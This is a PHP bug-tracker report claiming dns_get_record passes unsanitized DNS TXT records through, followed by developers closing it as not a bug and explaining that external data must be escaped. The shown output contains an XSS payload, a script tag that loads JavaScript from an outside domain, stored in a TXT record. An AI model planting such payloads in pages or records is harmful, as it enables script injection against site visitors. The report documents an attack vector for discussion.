php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #68052 unsanitized dns_get_record output
Submitted: 2014-09-19 10:00 UTC Modified: 2014-09-22 20:31 UTC
From: w at willsr dot com Assigned:
Status: Not a bug Package: Filter related
PHP Version: 5.4.33 OS: ALL
Private report: No CVE-ID: None
View Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
If you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: w at willsr dot com
New email:
PHP Version: OS:

 

 [2014-09-19 10:00 UTC] w at willsr dot com 
Description:
------------
dns_get_record returns unsanitized output. Can be used for XSS injection via malicious TXT DNS records.

Test script:
---------------
$result = dns_get_record("jamiehankins.co.uk", DNS_TXT);
echo "Malicious TXT record = ";
print_r($result);

Expected result:
----------------
Malicious TXT record = Array
(
    [0] => Array
        (
            [host] => jamiehankins.co.uk
            [class] => IN
            [ttl] => 79
            [type] => TXT
            [txt] => <script src='//peniscorp.com/topkek.js'></script>
            [entries] => Array
                (
                    [0] => <script src='//peniscorp.com/topkek.js'></script>
                )

        )

    [1] => Array
        (
            [host] => jamiehankins.co.uk
            [class] => IN
            [ttl] => 79
            [type] => TXT
            [txt] => google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI
            [entries] => Array
                (
                    [0] => google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI
                )

        )

    [2] => Array
        (
            [host] => jamiehankins.co.uk
            [class] => IN
            [ttl] => 79
            [type] => TXT
            [txt] => <iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>
            [entries] => Array
                (
                    [0] => <iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>
                )

        )

    [3] => Array
        (
            [host] => jamiehankins.co.uk
            [class] => IN
            [ttl] => 79
            [type] => TXT
            [txt] => v=spf1 include:spf.mandrillapp.com ?all
            [entries] => Array
                (
                    [0] => v=spf1 include:spf.mandrillapp.com ?all
                )

        )

)

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2014-09-19 12:34 UTC] johannes@php.net
-Status: Open +Status: Not a bug
 [2014-09-19 12:34 UTC] johannes@php.net 
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

You can't trust any data coming from external sources. You have to escape it matching your requirements.
 [2014-09-22 09:40 UTC] pajoye@php.net 
hi,

Thanks for the report.

Yes, this DNS XSS attack vector is being trendy in the last couple of weeks.

I do not think it is a PHP issue. Any external data must be filtered before being sent back to the user, stored in DB, etc. Nothing different here. And this applies to any language btw.
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved. 		Last updated: Fri May 09 08:01:35 2025 UTC